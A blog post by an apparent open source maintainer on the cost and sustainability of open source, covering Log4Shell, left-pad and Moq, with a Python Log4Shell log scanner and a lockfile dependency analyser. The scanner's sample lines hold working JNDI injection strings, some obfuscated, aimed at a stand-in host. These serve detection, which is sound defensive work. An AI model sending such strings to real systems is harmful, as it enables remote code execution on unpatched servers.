As I am an open source maintainer myself, I want to highlight my personal thoughts on why open source is important. I will put a bit more focus on the .NET side of things, but most of the thoughts are "valid" in the broader open source world.
Where do we use open source?
Let's start with a small experiment: on the following picture, count how many of the products you use in your private or professional work.
Chances are high that you use at least one of them. Bonus points for bUnit! The majority of products are built, to some extent, on open source products or libraries. Most of the time they are not backed by a multi-million dollar company that can fund FTEs working on the project. One of the most extreme cases is probably Log4J, the most famous logging library in the Java ecosystem. The main work is done by a handful of maintainers with no financial support. Just to give you some perspective, some of the biggest companies in the world use Log4J: Apple, Amazon, Steam, Alibaba, ...
So, by law, I am forced to insert the following picture by XKCD:
Source: https://imgs.xkcd.com/comics/dependency_2x.png
Log4J / Log4Shell
When the infamous Log4Shell vulnerability (CVE-2021-44228) was found, it got even worse. A very brief refresher on the issue: Log4J evaluated lookup expressions such as ${jndi:ldap://...} inside the strings it logged, so attacker-controlled input that ended up in a log message could make the application fetch and execute a payload from an attacker-controlled LDAP server, with the privileges of the application. If you read "remote code execution", you know shit is hitting the fan! The problem is how the issue was perceived by exactly those companies that use Log4J. According to this article, the maintainers received the following message:
We promise to keep it secret until your official release version comes out. Please hurry up.
I do understand that with a remote code execution vulnerability you might have to shut down affected services. Imagine you are Amazon or Alibaba: shutting down servers can cost you millions or billions in revenue in a very short time. But nothing had stopped them from supporting the project before. The maintainers tweeted this about the situation:
Keep in mind: the project, at the time, was run by volunteers. They didn't receive money. They did this in their free time!
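As an added example (mine, not part of the original post or of the Log4J project), here is a small Python scanner that flags the lookup strings behind Log4Shell in access-log or request lines. A naive grep for "${jndi:" misses the nesting tricks attackers used to hide the word, so the scanner first normalizes the few lookups commonly used for that (lower/upper lookups and the ":-default" fallback) and only then matches. The sample lines and the 203.0.113.x addresses are constructed for the example; the set of handled lookups is an assumption and deliberately incomplete, so treat this as a triage aid, not as a WAF rule.

```python
import re

# Innermost ${...} lookup, i.e. one whose body contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Any JNDI lookup that survives normalization. Matching "jndi:" alone, without
# checking the scheme, deliberately errs on the side of flagging.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Resolve one non-nested lookup body the way Log4J's lookup syntax would,
    for the lookups attackers used to hide 'jndi'. Returns None when the body
    must be left alone (a real jndi lookup, or a lookup this example ignores)."""
    stripped = body.strip()
    low = stripped.lower()
    if low.startswith("jndi:"):
        # Never rewrite the payload itself: ${jndi:ldap://h/a:-b} still triggers
        # the lookup, so the ":-b" suffix must not make it disappear.
        return None
    if low.startswith("lower:"):
        return stripped[6:].lower()
    if low.startswith("upper:"):
        return stripped[6:].upper()
    if ":-" in stripped:
        # ${prefix:key:-default}: an unresolvable key yields the default,
        # e.g. ${::-j} -> "j" and ${env:NOPE:-j} -> "j".
        return stripped.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Peel nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def _sub(m):
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(_sub, text)
        if not changed:
            break
    return text


def is_jndi_probe(line: str) -> bool:
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    return [(i, normalize(l)) for i, l in enumerate(lines, 1) if is_jndi_probe(l)]


# Constructed sample access-log lines (203.0.113.0/24 is documentation space).
SAMPLE_LINES = [
    '203.0.113.5 "GET /search?q=dotnet" ua="Mozilla/5.0"',
    '203.0.113.7 "GET /" ua="${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.7 "GET /" ua="${${lower:j}ndi:${lower:L}dap://203.0.113.10/a}"',
    '203.0.113.8 "GET /" ua="${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/x}"',
    '203.0.113.9 "GET /" ua="${${env:NOPE:-j}ndi:dns://203.0.113.10/t}"',
    'INFO app started, runtime ${sys:java.version}',
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LINES):
        print(f"line {number}: {line}")
```

Running it flags lines 2 to 5 and prints each in its de-obfuscated form, while the harmless ${sys:java.version} lookup in the last line is left alone. The point of the normalization step is that the matching happens on what Log4J would have evaluated, not on what the attacker typed.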
Other events
This wasn't the only incident where we saw issues in the open source space and in how they were handled:
left-pad, for example, was an NPM package that was removed because of a dispute between the maintainer, NPM and a company. The basic gist: the maintainer "Azer" had a package under the name "kik". On the other side there was the company "kik", which wanted that name reserved for itself! As "Azer" already occupied the name, lawyers got involved. NPM basically sided with "kik" and gave the name to the company. "Azer" then removed his most used library "left-pad" (yes, back then you could just delete packages from NPM). Of course, if you used "left-pad" directly or transitively (as a dependency of one of your dependencies), your build broke! And here my two cents: independent of left-pad and similar libraries, micro-libraries of this size are really, really hard to justify. I will showcase this later in the article.
Moq is one of the most famous mocking libraries in the dotnet ecosystem. Its creator Daniel Cazzulino (better known as kzu) tried a different approach to monetization: he developed SponsorLink. At the time, it basically checked whether the developer using it had donated to the library that embeds SponsorLink. It did this by sending an HTTP request to a server. For more details, I wrote a full article: "What's going on with Moq? SponsorLink and burnt soil!".
There was quite some backlash about this, but it shows some fundamental flaws:
- Open source projects are considered free (as in free labour and free usage)
- Monetization is hard!
- Keeping a project healthy over a long period of time is hard
But let's start with the first:
Is open source free?
We can give the simple answer: yes, of course!? I mean, I can just download any package and use it, no? Well, yes and no. Of course using open source projects is "free" in the sense that you didn't pay for the labour to create them, but you have different costs: maintenance and dependencies. That sounds odd, doesn't it? I mean, isn't that a reason why people use other people's libraries? To have less maintenance?
The fee of maintenance
When you use open source, you inherit not only its features but also its lifecycle.
- Open source libraries evolve over time. They might have critical issues where you have to update the package. Those updates might come with breaking changes or all sorts of things, so you have to check whether your software still does what it should!
- Some open source projects lose active maintainers over time. If you rely on such a library, you’re left with three choices:
- Continue using an outdated version (security risk!)
- Migrate to an alternative (might cost a lot of effort without delivering direct value)
- Take over maintenance yourself, aka fork. Then you carry the cost of maintaining the code you need and maybe don't need (if you can even separate the code in a way that lets you tell which is which).
- Sometimes the library you depend on doesn’t fit your needs, so you might have to fork it. Now you also "own" the code with all its costs, dependencies and implications!
In all of those cases you pay! You pay time and money! Every dependency you take on has a cost! You have to weigh whether or not that cost is justified, and you have to do this from time to time, not only once in the lifetime of the project. This is especially critical if you use lots of micro-libraries. With this I mean things like left-pad, which more often than not have at most 10 lines of code and fulfil very minimalistic functions. Another great example: is-even and is-odd. Both still have 200,000 (yes, two hundred thousand) downloads a week. Why? Why would anyone need this? How exactly is the return on investment justified?
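To make the "every dependency has a cost" point concrete, here is an added example (mine, not from the original post and not an npm tool): a Python script that reads a package-lock.json (lockfileVersion 3) and answers, per direct dependency, how many further packages it drags in, and which of your direct dependencies would have broken if a package like left-pad disappeared from the registry. The lockfile embedded below is constructed: the package names are real but the graph and versions are invented, and only the "dependencies" edges are followed (peer, optional and dev edges are ignored, an assumption of this example).

```python
import json
from collections import deque

# Constructed package-lock.json (lockfileVersion 3) for a made-up app. The
# names are real packages, the dependency graph and versions are invented.
LOCKFILE = json.loads(r"""
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app",
         "dependencies": {"line-wrap": "^1.0.0", "is-even": "^1.0.0", "table-format": "^2.0.0"}},
    "node_modules/line-wrap": {"version": "1.0.0", "dependencies": {"left-pad": "^1.3.0"}},
    "node_modules/table-format": {"version": "2.0.0", "dependencies": {"left-pad": "^0.0.3"}},
    "node_modules/table-format/node_modules/left-pad": {"version": "0.0.3"},
    "node_modules/left-pad": {"version": "1.3.0"},
    "node_modules/is-even": {"version": "1.0.0", "dependencies": {"is-odd": "^0.1.2"}},
    "node_modules/is-odd": {"version": "0.1.2", "dependencies": {"is-number": "^3.0.0"}},
    "node_modules/is-number": {"version": "3.0.0", "dependencies": {"kind-of": "^3.0.2"}},
    "node_modules/kind-of": {"version": "3.2.2"}
  }
}
""")


def _name_of(path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b'."""
    return path.rsplit("node_modules/", 1)[1]


def resolve(lock: dict, from_path: str, name: str) -> str:
    """Find the lockfile entry `name` resolves to for the package at `from_path`,
    walking up the node_modules tree the way Node's module loader does."""
    packages = lock["packages"]
    base = from_path
    while True:
        cand = f"{base}/node_modules/{name}" if base else f"node_modules/{name}"
        if cand in packages:
            return cand
        if not base:
            raise KeyError(f"{name} needed by {from_path or 'root'} is not in the lockfile")
        base = base.rsplit("/node_modules/", 1)[0] if "/node_modules/" in base else ""


def closure(lock: dict, start: str) -> set:
    """All lockfile entries reachable from `start` via 'dependencies' edges."""
    packages = lock["packages"]
    seen, todo = {start}, deque([start])
    while todo:
        cur = todo.popleft()
        for dep in packages[cur].get("dependencies", {}):
            path = resolve(lock, cur, dep)
            if path not in seen:
                seen.add(path)
                todo.append(path)
    return seen


def _direct_deps(lock: dict) -> list:
    return sorted(lock["packages"][""].get("dependencies", {}))


def direct_cost(lock: dict) -> dict:
    """For each direct dependency: how many further packages it drags in."""
    return {dep: len(closure(lock, resolve(lock, "", dep))) - 1 for dep in _direct_deps(lock)}


def who_pulls(lock: dict, name: str) -> list:
    """Direct dependencies whose transitive tree contains `name` in any version,
    i.e. what breaks for you if `name` vanishes or ships a critical bug."""
    return [dep for dep in _direct_deps(lock)
            if any(_name_of(p) == name for p in closure(lock, resolve(lock, "", dep)))]


def versions_of(lock: dict, name: str) -> list:
    """Every installed version of `name`; duplicates mean you patch it twice."""
    return sorted({e["version"] for p, e in lock["packages"].items()
                   if p and _name_of(p) == name})


if __name__ == "__main__":
    print("transitive packages per direct dependency:", direct_cost(LOCKFILE))
    print("if left-pad vanished, these would break:", who_pulls(LOCKFILE, "left-pad"))
    print("installed left-pad versions:", versions_of(LOCKFILE, "left-pad"))
```

In the constructed graph, is-even costs three extra packages (is-odd, is-number, kind-of) for a one-line check, and left-pad is pulled in twice in two different versions by two unrelated direct dependencies, so one unpublished package breaks both. Point the same functions at your own lockfile (json.load on package-lock.json) and the numbers are usually less comfortable.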
So no, open source is not free. It is free in the sense that it doesn't cost money up front, but there are costs to almost everything! Of course the same applies to closed source packages. They also carry such costs, but most of the time they cost you money on top, and you can't watch the development process out in the open.
All those incidents (and many more) I showcased earlier became known and were fixed quickly because everything happened openly and transparently! That is a good thing. I love open source. And of course there is also our side, the maintainers!
Should maintainers be paid?
THIS IS MY PERSONAL OPINION, as almost everything in this blog. First of all, there is no "one size fits all" solution. It depends on the circumstances and an individual's goals with the project. And if they should be paid, by whom?
- Should I donate/fund?
- Should my company do that?
Are there expectations linked to that money? Imagine you get $100 donated to your OSS project and said person/company opens an issue or feature request you deem not very important. Do you feel pressured to do it, just because they gave you money? As you can see, it isn't as easy and straightforward as it may seem. I know maintainers that will not take money for exactly those reasons.
My personal take is that one shouldn't expect money from creating open source software (though it is nice to receive some, of course). Well, at least not from the code one is publishing. There are companies like the UNO Platform that open sourced all of their products, but you can pay for an enterprise support contract. So in case you need help or features, they will help you out. They built the financial product around the open source code itself. Another example is NServiceBus from Particular Service Platform.
While it is nice to have a steady income from your open source contributions, for the majority of projects this will just not happen. Donations are nice so that the maintainers at least don't end up out of pocket. They might have costs like servers, certificates and whatnot to run the thing. If you appreciate a project: please feel free to use one of the common methods like GitHub Sponsors.
Also something which is very very important to point out: There is no obligation or warranty on the part of the maintainers to provide support, updates, or specific functionality. Open source contributors often work on their projects in their free time, driven by passion or a desire to give back to the community. Yet, despite this goodwill, the behavior of some users can be deeply discouraging. Using open source software comes with an inherent understanding (or at least, it should) - there is no formal contract between the maintainer and the user. The software is often provided 'as is,' with disclaimers clearly stating that there are no guarantees for fitness, reliability, or suitability for any specific purpose. And yes - this is exactly some part of the cost you pay if you use any dependency.
And with open source, I would also include stuff like this blog (the content, not the MIT-licensed source code, which obviously is open source). My blog doesn't have a specific license, but I regard it as "open source". Basically, everyone can and should take that content as he/she wishes. I don't finance the blog with sponsors, and I have no ads! In fact, there is no tracking that might identify a person. The only tracking I do is incrementing a counter when a blog post is clicked (without any information about the originator). So, for me, open source is not necessarily limited to source code! The official definition only includes software as far as I can tell.
But what can you do? Or better:
Why you should support open source!
The most important point: there is no alternative that is superior in most cases! We don't have any other system that brings so many upsides in contrast to the downsides it has! Maybe another question we can ask: how can I support open source?
How to support open source and what do I gain?
The easiest solution (as with many problems in our world): throw money at it! Of course this is nice and, as explained earlier, also helpful, but it isn't the only way. I get excited when there is someone willing to help out. Someone that takes their personal time and resources to make a common (as in shared) good better! If you create a library and someone writes you a bug report or a feature request, or files a pull request, that is (for me) one of the highest honors you can get. Because it means that someone can identify themselves with what you created. As an open source maintainer it is hard to find someone that sticks around and tries to shape that thing with you. Therefore giving time is, for me, the most valuable resource you can give!
If you don't know where to start, I always encourage people to support smaller libraries, as the cognitive load to step in is just smaller. Imagine filing a non-trivial PR for dotnet. In bUnit and many other libraries, maintainers often use the "good first issue" label:
There are even whole websites like: https://goodfirstissue.dev/ where you can search through repositories.
But what is in it for you, you as a contributor? Mainly:
- Gaining knowledge: discovering other code and thinking patterns can help you strengthen your own hard and soft skills. And yes, maybe that can even land you a job.
- Networking: I met awesome people around the globe just because of open source contributions.
- Altruism: You are doing good for the world. Your code can help directly or indirectly build awesome things!
But maybe the most important thing at the end: if you contribute to any open-source project, don't be a f$cking asshole! Be polite and try not to be rude. Human collaboration isn't a zero-sum game! I would argue (if you know the prisoner's dilemma) that contributing together is the way to go!